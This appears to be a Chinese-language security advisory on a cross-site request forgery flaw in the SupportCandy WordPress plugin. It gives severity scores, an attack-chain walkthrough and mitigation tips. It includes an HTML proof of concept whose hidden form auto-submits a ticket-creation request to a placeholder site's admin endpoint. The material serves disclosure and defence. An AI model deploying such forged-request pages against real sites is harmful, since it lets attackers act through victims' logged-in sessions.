CVE-2025-67598 WordPress SupportCandy插件跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-67598

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SupportCandy WordPress Plugin (<= 3.4.1)

漏洞概述

CVE-2025-67598是WordPress插件SupportCandy中的一个跨站请求伪造（CSRF）漏洞。SupportCandy是一款流行的WordPress工单支持系统插件，广泛用于企业内部工单管理、客户支持和服务请求处理。该漏洞存在于插件的多个功能模块中，由于缺少适当的CSRF令牌验证，攻击者可以诱导已登录的管理员或用户执行非预期的操作。攻击者通过构造恶意网页或链接，利用用户已认证的会话状态，诱骗用户执行未经授权的请求，如修改工单状态、删除数据、更改设置或执行其他敏感操作。由于该插件通常部署在企业环境中，承载着大量敏感的客户沟通记录和业务数据，一旦漏洞被利用，可能导致数据泄露、业务流程被篡改，甚至可能进一步利用该漏洞进行横向移动或提权攻击。此漏洞的CVSS评分为4.3，属于中危级别，主要因为攻击复杂度较低且利用条件相对简单，但需要用户交互才能完成攻击。

技术细节

该CSRF漏洞源于SupportCandy插件在处理关键操作时未正确实现CSRF令牌验证机制。在正常的Web应用程序安全实践中，所有可能修改服务器状态的操作（如POST、PUT、DELETE请求）都应包含唯一的CSRF令牌，以验证请求确实来源于合法的用户操作界面。然而，SupportCandy插件的某些端点缺少这种保护，允许攻击者构造恶意请求并诱导已认证用户执行。攻击者通常通过社会工程学手段，如在钓鱼邮件中嵌入恶意链接或在被控制的网站上放置恶意表单，当具有管理员或用户权限的受害者访问时，浏览器会自动发送带有有效会话Cookie的请求到目标服务器。服务器无法区分这是合法用户的操作还是攻击者伪造的请求。由于SupportCandy是WordPress插件，其认证机制依赖WordPress的核心会话管理，攻击者可以利用这一点绕过身份验证。攻击者可利用该漏洞执行的操作包括但不限于：创建、修改或删除工单，更改用户权限，修改插件设置，以及导出敏感数据。

攻击链分析

STEP 1

步骤1

攻击者创建一个包含恶意表单的网页，该表单会自动向SupportCandy插件的端点发送POST请求

STEP 2

步骤2

攻击者通过社会工程学手段（如钓鱼邮件、恶意链接、植入广告等）诱导已登录的SupportCandy管理员或用户访问该恶意网页

STEP 3

步骤3

受害者浏览器加载恶意页面后，自动向目标网站的WordPress端点发送带有有效认证Cookie的POST请求

STEP 4

步骤4

目标服务器收到请求，由于缺少CSRF验证，无法区分这是合法用户操作还是攻击者伪造的请求

STEP 5

步骤5

服务器执行请求中的操作（如创建工单、修改设置、删除数据等），攻击目标达成

STEP 6

步骤6

攻击者可根据漏洞利用情况，进一步利用获取的访问权限进行数据窃取或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-67598 - SupportCandy Plugin -->
<!-- This PoC demonstrates a CSRF attack to create/modify a ticket in SupportCandy -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - SupportCandy</title>
</head>
<body>
    <h1>CSRF PoC for CVE-2025-67598</h1>
    <p>This PoC demonstrates the CSRF vulnerability in SupportCandy plugin <= 3.4.1</p>
    
    <!-- Auto-submit form to create/modify ticket -->
    <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST" style="display:none;">
        <input type="hidden" name="action" value="sa_support_candy_create_ticket">
        <input type="hidden" name="ticket_title" value="Malicious Ticket Created via CSRF">
        <input type="hidden" name="ticket_description" value="This ticket was created by an attacker via CSRF vulnerability">
        <input type="hidden" name="ticket_priority" value="high">
        <input type="hidden" name="ticket_category" value="1">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
        console.log('CSRF request sent');
    </script>
    
    <p>If successful, a new ticket will be created/modified without user consent.</p>
</body>
</html>

影响范围

SupportCandy WordPress Plugin <= 3.4.1

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 启用WordPress的CSRF保护插件；2) 对管理员用户强制实施双因素认证；3) 限制管理员登录来源IP；4) 定期检查管理员操作日志以发现异常行为；5) 对插件目录实施写保护；6) 使用安全监控服务实时检测可疑请求模式。